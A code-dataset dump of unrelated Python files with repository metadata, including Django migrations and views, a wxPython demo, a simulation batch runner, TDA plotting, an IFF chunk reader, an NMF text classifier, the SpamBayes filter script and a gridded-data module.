# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-11-27 22:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ics', '0059_account_contact_inventoryunit_order_orderinventoryunit'),
]
operations = [
migrations.AddField(
model_name='goal',
name='rank',
field=models.PositiveSmallIntegerField(default=0),
),
]
| [
"[email protected]"
] | |
17b4f6c8cce0c08486364ca7eb83ca1335cd18d2 | 1a3ba2a78670817c59965a1bc35c98718b0b5e44 | /baseCtrlElements/listBoxes.py | 4630d3741cbcc9f45d0231da256711c3f39bce4d | [] | no_license | yulits/MywxPythonDemo | 01fc24f3e9bd95c19dad6c84cd2b2ff389d9e854 | 4f59e1fedca6615b4c893f575edbad73fafc8d91 | refs/heads/master | 2020-04-03T01:29:55.504279 | 2016-07-09T07:41:59 | 2016-07-09T07:41:59 | 59,916,853 | 0 | 0 | null | 2016-07-09T07:42:00 | 2016-05-28T22:24:23 | Python | UTF-8 | Python | false | false | 764 | py |
import wx
class ListBoxFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, -1, 'List Box Example',
size=(250, 200))
panel = wx.Panel(self, -1)
sampleList = ['zero', 'one', 'two', 'three', 'four', 'five',
'six', 'seven', 'eight', 'nine', 'ten', 'eleven',
'twelve', 'thirteen', 'fourteen']
listBox = wx.ListBox(panel, -1, (20, 20), (80, 120),
sampleList, wx.LB_MULTIPLE)
listBox.SetSelection(3)
        checkListBox = wx.CheckListBox(panel, -1, (120, 20), (80, 120),
                                       sampleList, wx.LB_SINGLE)
        checkListBox.SetSelection(1)
if __name__ == '__main__':
app = wx.App()
ListBoxFrame().Show()
app.MainLoop()
| [
"[email protected]"
] | |
64f9867794ce1730c12b0b60310dfcf9a7a39910 | c0093a13696fd7df81ae4e35bbfbe840d3c1ba42 | /pages/views.py | d278f0690d59836ed056f9fb2becdd9b6767e2ea | [] | no_license | Isaac3N/docker-hello | 471462cb0fe7f64c1ccafe464c43ea9415f56639 | 6eef23cf62a9aa62935848ef9faf6685f343d5ee | refs/heads/master | 2023-08-15T14:12:58.500883 | 2021-09-27T20:58:16 | 2021-09-27T20:58:16 | 410,943,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home_page_view(request):
    return HttpResponse('Hello, World!')
| [
"[email protected]"
] | |
051d123e789c4e85957c79b6a9586465d5c55a92 | ddd5314a6c4f6b299adf65b88d1547e387c67aea | /py/fm_config.py | 7591659307262a7f4c1b791381c3f19cf4edbfc7 | [
"Apache-2.0"
] | permissive | colinsongf/tensorflow_ffm | 4d5ac52ca1f4c9232c3adb3b8e41b31792f4cb01 | f2bcba26130df1bbd6f9a67da3b609e192bc341a | refs/heads/master | 2021-01-17T18:15:08.127839 | 2016-09-18T22:26:46 | 2016-09-18T22:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py |
class FmConfig:
def __init__(self):
self.batch_size = 10000
self.factor_num = 10
self.epoch_num = 5
self.init_value_range = 0.0001
self.factor_lambda = 1
self.bias_lambda = 1
self.vocabulary_size = 500000
self.thread_num = 2
self.train_file = ["./data/train.sample.txt"]
        self.test_file = ["./data/test.sample.txt"]
| [
"[email protected]"
] | |
2b196d0ecd4f96f2df0d827a47041689c7abca0e | fa21a32c71a6a68a612c66278b5efe353dc89eab | /automate_speeds.py | b6dffa09b63a5e299146c1df2b1f7af253c26e78 | [] | no_license | emorysmithis/ND-Crowd-Simulator | 8fb88ed5498667b1d0a283ad62fbf81ae7ac9dbb | 8a6e4019d68ceb7be9f8b51a7f64947ac5e868a5 | refs/heads/main | 2023-05-01T08:35:28.193664 | 2021-05-12T18:30:49 | 2021-05-12T18:30:49 | 350,157,800 | 0 | 0 | null | 2021-05-12T14:39:50 | 2021-03-22T00:33:19 | Python | UTF-8 | Python | false | false | 2,171 | py |
#!/usr/bin/env python3
import os
import sys
import multiprocessing as mp
from datetime import datetime
def worker(input_list):
command = './simulation.py ' + ' '.join(input_list)
print(command)
os.system(command)
print(f'Finished: {command}')
if __name__ == '__main__':
# Get start time
time_start = datetime.now()
# Initialize variables
directories = sys.argv[1:]
days = ['m', 't', 'w', 'r', 'f']
processes = []
start = ''
end = ''
# Iterate through each directory
for d in directories:
# Get start_time and end_time
with open (d+'/time.txt', 'r') as f:
start = f.readline().strip()
end = f.readline().strip()
# Run simulation for each day of the week
for day in days:
input_file = d + '/' + day + '_students.txt'
# Run simulation for each combination of speeds
step = 10
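            # Enumerate speed mixes (speed1, speed2, speed3) in 10% increments
            # that always sum to 100%; each triple is one simulation setting.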
for speed1 in range(30, 110, 10):
upper_limit = 100 - speed1 + 10
for speed2 in range(0, upper_limit, 10):
speed3 = 100 - speed1 - speed2
speed_arg = str(speed1) + '_' + str(speed2) + '_' + str(speed3)
output_file = d + '/speeds_batch/output_' + day + '_' + speed_arg + '.txt'
if not os.path.exists(d+'/speeds_batch'):
os.mkdir(d+'/speeds_batch')
process = mp.Process(target=worker, args=(['-s', input_file, '-start', start, '-end', end, '-n', '50', '-speed', speed_arg, '>', output_file],))
processes.append(process)
process.start()
for process in processes:
process.join()
intermediate_time = datetime.now() - time_start
print(f"Joined! Elapsed Time: {intermediate_time}, Time Now: {datetime.now()}")
processes = []
# Get end time
time_end = datetime.now()
tdelta = time_end - time_start
print('--------TIME--------')
print('start:', time_start)
print('end:', time_end)
print('timedelta:', tdelta)
| [
"cyoun@ndedu"
] | cyoun@ndedu |
464b5faef31e5fd150ec7d665f812f62d8541bb2 | 1fbeda7f33d243aaeff49fab66a748c30169803a | /OpenTDA/tda/plotting.py | 57042a80546bd319cb0d4ff61c6066cf2fe80e52 | [
"MIT",
"Apache-2.0"
] | permissive | iammosespaulr/TDA-tutorial | 5c37a46f352712f4a6f5122240fb7fb099a0cd02 | 657873e95a6f7024406c2c1f2ce58718220dcd66 | refs/heads/master | 2022-11-13T08:10:36.391940 | 2020-07-05T19:49:56 | 2020-07-05T19:49:56 | 267,326,719 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py |
import matplotlib.pyplot as plt
def drawComplex(data, ph, axes=[-6, 8, -6, 6]):
plt.clf()
plt.axis(axes) # axes = [x1, x2, y1, y2]
plt.scatter(data[:, 0], data[:, 1]) # plotting just for clarity
for i, txt in enumerate(data):
plt.annotate(i, (data[i][0] + 0.05, data[i][1])) # add labels
# add lines for edges
for edge in [e for e in ph.ripsComplex if len(e) == 2]:
# print(edge)
pt1, pt2 = [data[pt] for pt in [n for n in edge]]
# plt.gca().add_line(plt.Line2D(pt1,pt2))
line = plt.Polygon([pt1, pt2], closed=None, fill=None, edgecolor='r')
plt.gca().add_line(line)
# add triangles
for triangle in [t for t in ph.ripsComplex if len(t) == 3]:
pt1, pt2, pt3 = [data[pt] for pt in [n for n in triangle]]
line = plt.Polygon([pt1, pt2, pt3], closed=False,
color="blue", alpha=0.3, fill=True, edgecolor=None)
plt.gca().add_line(line)
plt.show()
def graph_barcode(data, ph, homology_group=0):
persistence = ph.transform(data)
# this function just produces the barcode graph for each homology group
xstart = [s[1][0] for s in persistence if s[0] == homology_group]
xstop = [s[1][1] for s in persistence if s[0] == homology_group]
y = [0.1 * x + 0.1 for x in range(len(xstart))]
plt.hlines(y, xstart, xstop, color='b', lw=4)
# Setup the plot
ax = plt.gca()
plt.ylim(0, max(y) + 0.1)
ax.yaxis.set_major_formatter(plt.NullFormatter())
plt.xlabel('epsilon')
plt.ylabel("Betti dim %s" % (homology_group,))
plt.show()
| [
"[email protected]"
] | |
2188924ba0799b40255131ca820e033d736adf08 | 79e6603f79ffbb2721c8ecbdeed294ab3b23e3c7 | /authapp/migrations/0008_alter_shopuser_activation_key_expires.py | 47764f3ae2e87696a53cc0e84650970491d77726 | [] | no_license | MaksShI/Django_2 | 185ae4759bd90f627a0ad9ff39d690487f2c0b26 | 78f2ebdbfb047bc97eb8fd3acb6734dd856ea33f | refs/heads/main | 2023-07-13T09:51:50.804403 | 2021-08-13T08:53:20 | 2021-08-13T08:53:20 | 391,163,141 | 0 | 0 | null | 2021-08-24T11:49:57 | 2021-07-30T18:52:09 | Python | UTF-8 | Python | false | false | 537 | py |
# Generated by Django 3.2.3 on 2021-08-03 14:18
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('authapp', '0007_alter_shopuser_activation_key_expires'),
]
operations = [
migrations.AlterField(
model_name='shopuser',
name='activation_key_expires',
field=models.DateTimeField(default=datetime.datetime(2021, 8, 5, 14, 18, 41, 273073, tzinfo=utc)),
),
]
| [
"[email protected]"
] | |
c51ffa2ab012e68f531724e0e4652c2150f831a5 | 55a273347cb103fe2b2704cb9653956956d0dd34 | /code/tmp_rtrip/chunk.py | dbe368c93d55a80a28e671121ea0264ecde55a31 | [
"MIT"
] | permissive | emilyemorehouse/ast-and-me | 4af1bc74fc967ea69ac1aed92664f6428acabe6a | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | refs/heads/master | 2022-11-18T03:50:36.505882 | 2018-05-12T17:53:44 | 2018-05-12T17:53:44 | 115,035,148 | 25 | 1 | MIT | 2022-11-04T11:36:43 | 2017-12-21T18:27:19 | Python | UTF-8 | Python | false | true | 5,303 | py |
"""Simple class to read IFF chunks.
An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File
Format)) has the following structure:
+----------------+
| ID (4 bytes) |
+----------------+
| size (4 bytes) |
+----------------+
| data |
| ... |
+----------------+
The ID is a 4-byte string which identifies the type of chunk.
The size field (a 32-bit value, encoded using big-endian byte order)
gives the size of the whole chunk, including the 8-byte header.
Usually an IFF-type file consists of one or more chunks. The proposed
usage of the Chunk class defined here is to instantiate an instance at
the start of each chunk and read from the instance until it reaches
the end, after which a new instance can be instantiated. At the end
of the file, creating a new instance will fail with an EOFError
exception.
Usage:
while True:
try:
chunk = Chunk(file)
except EOFError:
break
chunktype = chunk.getname()
while True:
data = chunk.read(nbytes)
        if not data:
            break
        # do something with data
The interface is file-like. The implemented methods are:
read, close, seek, tell, isatty.
Extra methods are: skip() (called by close, skips to the end of the chunk),
getname() (returns the name (ID) of the chunk)
The __init__ method has one required argument, a file-like object
(including a chunk instance), and one optional argument, a flag which
specifies whether or not chunks are aligned on 2-byte boundaries. The
default is 1, i.e. aligned.
"""
class Chunk:
def __init__(self, file, align=True, bigendian=True, inclheader=False):
import struct
self.closed = False
self.align = align
if bigendian:
strflag = '>'
else:
strflag = '<'
self.file = file
self.chunkname = file.read(4)
if len(self.chunkname) < 4:
raise EOFError
try:
self.chunksize = struct.unpack_from(strflag + 'L', file.read(4))[0]
except struct.error:
raise EOFError
if inclheader:
self.chunksize = self.chunksize - 8
self.size_read = 0
try:
self.offset = self.file.tell()
except (AttributeError, OSError):
self.seekable = False
else:
self.seekable = True
def getname(self):
"""Return the name (ID) of the current chunk."""
return self.chunkname
def getsize(self):
"""Return the size of the current chunk."""
return self.chunksize
def close(self):
if not self.closed:
try:
self.skip()
finally:
self.closed = True
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
def seek(self, pos, whence=0):
"""Seek to specified position into the chunk.
Default position is 0 (start of chunk).
If the file is not seekable, this will result in an error.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if not self.seekable:
raise OSError('cannot seek')
if whence == 1:
pos = pos + self.size_read
elif whence == 2:
pos = pos + self.chunksize
if pos < 0 or pos > self.chunksize:
raise RuntimeError
self.file.seek(self.offset + pos, 0)
self.size_read = pos
def tell(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return self.size_read
def read(self, size=-1):
"""Read at most size bytes from the chunk.
If size is omitted or negative, read until the end
of the chunk.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if self.size_read >= self.chunksize:
return b''
if size < 0:
size = self.chunksize - self.size_read
if size > self.chunksize - self.size_read:
size = self.chunksize - self.size_read
data = self.file.read(size)
self.size_read = self.size_read + len(data)
if (self.size_read == self.chunksize and self.align and self.
chunksize & 1):
dummy = self.file.read(1)
self.size_read = self.size_read + len(dummy)
return data
def skip(self):
"""Skip the rest of the chunk.
If you are not interested in the contents of the chunk,
this method should be called so that the file points to
the start of the next chunk.
"""
if self.closed:
raise ValueError('I/O operation on closed file')
if self.seekable:
try:
n = self.chunksize - self.size_read
if self.align and self.chunksize & 1:
n = n + 1
self.file.seek(n, 1)
self.size_read = self.size_read + n
return
except OSError:
pass
while self.size_read < self.chunksize:
n = min(8192, self.chunksize - self.size_read)
dummy = self.read(n)
if not dummy:
raise EOFError
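# Usage sketch for a little-endian RIFF/WAVE file (hypothetical filename):
#   with open('sound.wav', 'rb') as f:
#       riff = Chunk(f, bigendian=False)   # outer 'RIFF' chunk
#       riff.read(4)                       # skip the b'WAVE' form type
#       while True:
#           try:
#               sub = Chunk(riff, bigendian=False)
#           except EOFError:
#               break
#           print(sub.getname(), sub.getsize())
#           sub.skip()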
| [
"[email protected]"
] | |
6e9779222154c036199119c55cd1502ab2165523 | b42c827e57b6c24251dedf0894ba3a97eb876b7c | /sub_mod.py | c30c96e5c0f1c2426d4e872035dc146293871810 | [] | no_license | Aswin-Sureshumar/Python-Programs | 77f20bacefc32307b60a00e9345cae95dc14185f | 0387eb732e1b43995d161b5088b49b1155405411 | refs/heads/master | 2022-12-22T11:53:04.864017 | 2020-09-22T10:23:57 | 2020-09-22T10:23:57 | 283,938,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py |
def sub(a, b):
    c = a - b
    print(c)
    return c  # also return the result so callers can use it
| [
"[email protected]"
] | |
c620965011fd4bf19b37d00c6524872b433969c7 | 39d4504ec1da8975fac526d6801b94f4348b6b61 | /research/gan/mnist/conditional_eval_test.py | 178f7b1d87d644748c4bc0bdacae595263d7a2b3 | [
"Apache-2.0"
] | permissive | vincentcheny/models | fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad | afb1a59fc1bc792ac72d1a3e22e2469020529788 | refs/heads/master | 2020-07-23T21:38:24.559521 | 2019-11-15T07:50:11 | 2019-11-15T07:50:11 | 207,712,649 | 1 | 0 | Apache-2.0 | 2019-09-11T03:12:31 | 2019-09-11T03:12:31 | null | UTF-8 | Python | false | false | 1,124 | py |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tfgan.examples.mnist.conditional_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import conditional_eval
class ConditionalEvalTest(absltest.TestCase):
def test_build_graph(self):
conditional_eval.main(None, run_eval_loop=False)
if __name__ == '__main__':
absltest.main()
| [
"[email protected]"
] | |
f90693fda41d7401e673b3cd156e04fc78d3b2d1 | 964c0732b647cde0aca6aa0388a0fd0f2c1fea11 | /code/proposed_model/nmf.py | 457c74ed82249dd63f1ba99d6d0631c488e5911b | [
"Apache-2.0"
] | permissive | levelupai/short_text_clustering | c97daf1dac3bbb26c5c2649b2b02e9c5a2344ed2 | d83f4f429890dd8d9d58e8cbdf7bace902c4ad6b | refs/heads/master | 2020-03-22T19:13:07.228547 | 2018-07-11T09:56:23 | 2018-07-11T09:56:23 | 140,513,759 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,345 | py |
import pickle
import numpy
import random
import ast

# word_ids.py stores a literal {word: id} dict on one line;
# ast.literal_eval parses it without executing arbitrary code.
with open('word_ids.py', 'r') as f:
    word_to_id = ast.literal_eval(f.readline())
components = None
with open('components_dump.txt', 'br') as c:
components = pickle.load(c)
windows_sum = sum(components[0]) # windows
not_windows_sum = sum(components[1]) # not windows
# recall = probability of detecting 0 (windows) when it really is 0
# false positive rate = probability of detecting 0 (windows) when it really is 1
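# components[0] and components[1] hold the per-word NMF weights for the
# "windows" and "not windows" classes; dividing a word's weight by the row
# sum (windows_sum / not_windows_sum) gives an approximate per-class word
# probability, which get_score() accumulates below.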
def get_score(filename, expected, threshold_val):
correct = 0
total = 0
unmatched = 0
true_positive = 0
true_negative = 0
false_positive = 0
false_negative = 0
with open(filename, 'r') as c:
lines = c.readlines()
for line in lines:
score_for_0 = 0.0
score_for_1 = 0.0
significant_words = 0
new_line = line.lower().strip().replace("\"", "")
words = new_line.split(" ")
for word in words:
if word in word_to_id:
if components[0][word_to_id[word]] > threshold_val or components[1][word_to_id[word]] > threshold_val:
score_for_0 += (components[0][word_to_id[word]] / windows_sum)
score_for_1 += (components[1][word_to_id[word]] / not_windows_sum)
significant_words += 1
#print(word)
if score_for_0 == score_for_1:
final_category = "Undecided"
unmatched += 1
score_for_0 += random.randint(1,100000)
score_for_1 += random.randint(1,100000)
#false_positive += 0.5
#true_positive += 0.5
#false_positive += 1
#false_negative += 1
elif score_for_0 > score_for_1:
final_category = "0"
if expected == 0:
correct += 1
true_positive += 1
else:
false_positive += 1
else:
final_category = "1"
if expected == 1:
correct += 1
true_negative += 1
else:
false_negative += 1
#print("%s, sig words: %s, 0: %s, 1: %s, final category: %s" % (line, significant_words, score_for_0, score_for_1, final_category))
total += 1
incorrect = total - correct - unmatched
# correct is true positive rate
return [correct, incorrect, total, unmatched, true_positive, true_negative, false_positive, false_negative]
not_windows_correct_rate = []
windows_correct_rate = []
total_size = 0
csvfile = open('roc.csv', 'w+')
for threshold in range(0, 101):
scaled_threshold = threshold / 10.0
correct, incorrect, total, unmatched, true_positive, true_negative, false_positive, false_negative = get_score('../windows/out_non_random100.csv', 1, scaled_threshold)
correct2, incorrect2, total2, unmatched2, true_positive2, true_negative2, false_positive2, false_negative2 = get_score('../windows/out_random100.csv', 0, scaled_threshold)
#print("windows", correct, incorrect, total, unmatched)
csvfile.write('%s,%s,%s,%s,%s\n' % (scaled_threshold, total, unmatched, false_positive / total, true_positive2 / (total2)))
csvfile.flush()
csvfile.close()
| [
"[email protected]"
] | |
39edc3c8c2848e87569b806d2de9143a305761da | dc7dc1ab85403a4467044d4c0c936c17fff5225a | /fstmerge/examples/SpamBayes/rev3103-3133/spambayes/scripts/sb_filter.py | a91dff7fc51be65830e018aa17a5c5e3f14b2bd7 | [] | no_license | RoDaniel/featurehouse | d2dcb5f896bbce2c5154d0ba5622a908db4c5d99 | df89ce54ddadfba742508aa2ff3ba919a4a598dc | refs/heads/master | 2020-12-25T13:45:44.511719 | 2012-01-20T17:43:15 | 2012-01-20T17:43:15 | 1,919,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,846 | py | """Usage: %(program)s [options] [filenames]
Options can one or more of:
-h
show usage and exit
-v
show version and exit
-x
show some usage examples and exit
-d DBFILE
use database in DBFILE
-p PICKLEFILE
use pickle (instead of database) in PICKLEFILE
-n
create a new database
* -f
filter (default if no processing options are given)
* -g
(re)train as a good (ham) message
* -s
(re)train as a bad (spam) message
* -t
filter and train based on the result -- you must
make sure to untrain all mistakes later. Not recommended.
* -G
untrain ham (only use if you've already trained this message)
* -S
untrain spam (only use if you've already trained this message)
-o section:option:value
set [section, option] in the options database to value
-P
Run under control of the Python profiler, if it is available
All options marked with '*' operate on stdin, and write the resultant
message to stdout.
If no filenames are given on the command line, standard input will be
processed as a single message. If one or more filenames are given on the
command line, each will be processed according to the following rules:
* If the filename is '-', standard input will be processed as a single
message (may only be usefully given once).
* If the filename starts with '+' it will be processed as an MH folder.
* If the filename is a directory and it contains a subdirectory named
'cur', it will be processed as a Maildir.
* If the filename is a directory and it contains a subdirectory named
'Mail', it will be processed as an MH Mailbox.
* If the filename is a directory and not a Maildir nor an MH Mailbox, it
will be processed as a Mailbox directory consisting of just .txt and
.lorien files.
* Otherwise, the filename is treated as a Unix-style mailbox (messages
begin on a line starting with 'From ').
Output is always to standard output as a Unix-style mailbox.
"""
import os
import sys
import getopt
from spambayes import hammie, Options, mboxutils, storage
from spambayes.Version import get_current_version
try:
True, False
except NameError:
True, False = 1, 0
program = sys.argv[0]
example_doc = """_Examples_
filter a message on disk:
%(program)s < message
(re)train a message as ham:
%(program)s -g < message
(re)train a message as spam:
%(program)s -s < message
procmail recipe to filter and train in one step:
:0 fw
| %(program)s -t
mutt configuration: This binds the 'H' key to retrain the message as
ham, and prompt for a folder to move it to. The 'S' key retrains as
spam, and moves to a 'spam' folder. See contrib/muttrc in the spambayes
distribution for other neat mutt tricks.
macro index S "|sb_filter.py -s | procmail\n"
macro pager S "|sb_filter.py -s | procmail\n"
macro index H "|sb_filter.py -g | procmail\n"
macro pager H "|sb_filter.py -g | procmail\n"
color index red black "~h 'X-Spambayes-Disposition: spam' ~F"
"""
def examples():
print example_doc % globals()
sys.exit(0)
def usage(code, msg=''):
"""Print usage message and sys.exit(code)."""
v = get_current_version()
print >> sys.stderr, v.get_long_version("SpamBayes Command Line Filter")
print >> sys.stderr
if msg:
print >> sys.stderr, msg
print >> sys.stderr
print >> sys.stderr, __doc__ % globals()
sys.exit(code)
def version():
v = get_current_version()
print >> sys.stderr, v.get_long_version("SpamBayes Command Line Filter")
sys.exit(0)
class HammieFilter(object):
def __init__(self):
options = Options.options
if options["Storage", "persistent_storage_file"] == \
options.default("Storage", "persistent_storage_file"):
options["Storage", "persistent_storage_file"] = \
"~/.hammiedb"
options.merge_files(['/etc/hammierc',
os.path.expanduser('~/.hammierc')])
self.dbname, self.usedb = storage.database_type([])
self.mode = self.h = None
def open(self, mode):
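        # mode: 'r' opens the database read-only for scoring, 'c' opens or
        # creates it for training, 'n' forces a brand-new database; the
        # handle is cached and reused unless the requested mode changes.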
if self.h is None or self.mode != mode:
if self.h is not None:
if self.mode != 'r':
self.h.store()
self.h.close()
self.mode = mode
self.h = hammie.open(self.dbname, self.usedb, self.mode)
def close(self):
if self.h is not None:
if self.mode != 'r':
self.h.store()
self.h.close()
self.h = None
__del__ = close
def newdb(self):
self.open('n')
self.close()
def filter(self, msg):
if Options.options["Hammie", "train_on_filter"]:
self.open('c')
else:
self.open('r')
return self.h.filter(msg)
def filter_train(self, msg):
self.open('c')
return self.h.filter(msg, train=True)
def train_ham(self, msg):
self.open('c')
self.h.train_ham(msg, Options.options["Headers", "include_trained"])
self.h.store()
def train_spam(self, msg):
self.open('c')
self.h.train_spam(msg, Options.options["Headers", "include_trained"])
self.h.store()
def untrain_ham(self, msg):
self.open('c')
self.h.untrain_ham(msg)
self.h.store()
def untrain_spam(self, msg):
self.open('c')
self.h.untrain_spam(msg)
self.h.store()
def main(profiling=False):
h = HammieFilter()
actions = []
opts, args = getopt.getopt(sys.argv[1:], 'hvxd:p:nfgstGSo:P',
['help', 'version', 'examples', 'option='])
create_newdb = False
do_profile = False
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-v', '--version'):
version()
elif opt in ('-x', '--examples'):
examples()
elif opt in ('-o', '--option'):
Options.options.set_from_cmdline(arg, sys.stderr)
elif opt == '-f':
actions.append(h.filter)
elif opt == '-g':
actions.append(h.train_ham)
elif opt == '-s':
actions.append(h.train_spam)
elif opt == '-t':
actions.append(h.filter_train)
elif opt == '-G':
actions.append(h.untrain_ham)
elif opt == '-S':
actions.append(h.untrain_spam)
elif opt == '-P':
do_profile = True
if not profiling:
try:
import cProfile
except ImportError:
pass
else:
return cProfile.run("main(True)")
elif opt == "-n":
create_newdb = True
h.dbname, h.usedb = storage.database_type(opts)
if create_newdb or not os.path.exists(h.dbname):
h.newdb()
print >> sys.stderr, "Created new database in", h.dbname
if create_newdb:
sys.exit(0)
if actions == []:
actions = [h.filter]
if not args:
args = ["-"]
for fname in args:
mbox = mboxutils.getmbox(fname)
for msg in mbox:
for action in actions:
action(msg)
if args == ["-"]:
unixfrom = msg.get_unixfrom() is not None
else:
unixfrom = True
result = mboxutils.as_string(msg, unixfrom=unixfrom)
sys.stdout.write(result)
if __name__ == "__main__":
main()
| [
"joliebig"
] | joliebig |
6f3af3a3f0b28b4263897e9c29037aa864e04765 | 964c0732b647cde0aca6aa0388a0fd0f2c1fea11 | /mediacenterRecommend/mediacenterRecommend/wsgi.py | d5a8553b625e7f18927f29babd3f2f7e40c96673 | [] | no_license | nekketsu2010/mediacenterRecommend | f592a36447c10ac11118b51e1c63ba7478924f5a | d69c79be3644e33e9ae71702ff094a939df7f638 | refs/heads/master | 2020-04-11T12:25:25.708479 | 2018-12-14T12:06:26 | 2018-12-14T12:06:26 | 161,779,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py |
"""
WSGI config for mediacenterRecommend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mediacenterRecommend.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
2b680068fcd0bf94c0332516bfbc1916dd2a4a49 | 3b6bf73a68b77f330d0ffb01d3e5e8fe11a89c30 | /common-lib/GriddedData.py | f9f307fe4d73c6da6f23e3aed5a7d6ab843a9fd6 | [] | no_license | auraoupa/diags-CMEMS-on-occigen | 37e47fb5b663c09c6eeb7c04e0d423b72318d09e | 01f9d3f9d0d20bbcecd8adfcc23f866453133c94 | refs/heads/master | 2022-03-30T18:40:49.259651 | 2020-02-19T15:15:26 | 2020-02-19T15:15:26 | 217,243,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,881 | py |
#!/usr/bin/env python
#=======================================================================
"""GriddedData.py
Define grid object and interpolation tools for working with gridded data.
Some basic plotting facility is also provided.
"""
#=======================================================================
import numpy
import numpy as npy
N = npy
np = npy
import numpy.ma as ma
import os
os.environ['PROJ_LIB'] = '/home/albert/anaconda2/envs/lupa-py3/share/proj'
dint = npy.int8
dfloat = npy.float32
grav = 9.81 # acceleration due to gravity (m.s-2)
omega = 7.292115083046061e-5 # earth rotation rate (s-1)
earthrad = 6371229 # mean earth radius (m)
deg2rad = npy.pi / 180.
mod360 = lambda x: npy.mod(x+180,360)-180
#========================= Grid Class ===================================
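# Typical construction (sketch; lon/lat in degrees, mask uses 1 = ocean and
# 0 = land following the NEMO conventions used below):
#   lon = npy.arange(-180., 180., 1.)
#   lat = npy.arange(-75., 76., 1.)
#   grd = grid2D(navlat=lat, navlon=lon)
#   u_on_t = grd.gridU_2_gridT(u)   # move a field from the U-grid to the T-grid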
class grid2D:
"""Two-dimensional grid object with the associated operators.
This class is based on NEMO ocean model notations and operators.
"""
def __init__(self,navlat=None,navlon=None,mask=None):
"""Initialize grid object from navlon,navlat arrays
"""
if (len(navlat.shape)==1 and len(navlon.shape)==1) or (navlon.shape!=navlat.shape):
navlon, navlat = npy.meshgrid(navlon,navlat)
#
self.navlon = navlon
self.navlat = navlat
self.tmask = mask
self.jpj,self.jpi = navlon.shape
self.jpk = 1
self.depthT = [0]
self.shape = (self.jpj,self.jpi)
self._get_gphiglam()
self._get_scalefactors()
self._get_masks()
self._get_surf()
def _get_gphiglam(self):
"""Get glam*,gphi* for * in t,u,v,f
"""
self.glamt = self.navlon
self.gphit = self.navlat
self.glamu = (self.glamt + npy.roll(self.glamt,-1,axis=-1))/2.
self.gphiu = (self.gphit + npy.roll(self.gphit,-1,axis=-1))/2.
self.glamv = (self.glamt + npy.roll(self.glamt,-1,axis=-2))/2.
self.gphiv = (self.gphit + npy.roll(self.gphit,-1,axis=-2))/2.
self.glamf = (self.glamu + npy.roll(self.glamu,-1,axis=-2))/2.
self.gphif = (self.gphiu + npy.roll(self.gphiu,-1,axis=-2))/2.
def _get_scalefactors(self,method='1'):
"""Get the scale factors (m) : e1*,e2* for * in t,u,v,f
"""
for gtype in ['t','u','v','f']:
lam = eval('self.glam' + gtype)
phi = eval('self.gphi' + gtype)
djlam,dilam = npy.gradient(lam)
djphi,diphi = npy.gradient(phi)
e1 = earthrad * deg2rad * npy.sqrt( (dilam * npy.cos(deg2rad * phi))**2. + diphi**2.)
e2 = earthrad * deg2rad * npy.sqrt( (djlam * npy.cos(deg2rad*phi))**2. + djphi**2.)
exec('self.e1' + gtype + ' = e1')
exec('self.e2' + gtype + ' = e2')
def _get_masks(self):
"""Get t,u,v,f-masks
"""
if (self.tmask is None):
self.tmask = npy.ones(self.shape,dtype=dint)
self.umask = self.tmask
self.vmask = self.tmask
self.fmask = self.tmask
else:
jpj,jpi = self.shape
self.tmask = npy.array(self.tmask,dtype=dint)
bigtmask = npy.ones((jpj+1,jpi+1),dtype=dint)
bigtmask[0:jpj,0:jpi] = self.tmask
self.umask= bigtmask[0:jpj,0:jpi] * bigtmask[0:jpj,1:jpi+1]
self.vmask= bigtmask[0:jpj,0:jpi] * bigtmask[1:jpj+1,0:jpi]
self.fmask= bigtmask[0:jpj,0:jpi] * bigtmask[0:jpj,1:jpi+1]\
* bigtmask[1:jpj+1,0:jpi] * bigtmask[1:jpj+1,1:jpi+1]
def _get_surf(self):
"""Compute array surfaces.
"""
self.u_surf = self.e2u * self.e1u
self.v_surf = self.e2v * self.e1v
self.f_surf = self.e2f * self.e1f
self.t_surf = self.e2t * self.e1t
self.surface = npy.sum(npy.sum(self.tmask * self.t_surf,axis=-1),axis=-1)
def _get_corio(self):
"""Compute coriolis parameter on the grid
"""
        for grid in ['u','v','t']:
            coriogrid = 'corio_' + grid
            if not(hasattr(self,coriogrid)):
                setattr(self, coriogrid, corio(self, grid=grid))
#---------------------------- Masking ---------------------------------------
def set_mask(self,nq,mask,msk_value=1.E20):
"""Set a mask on an array.
"""
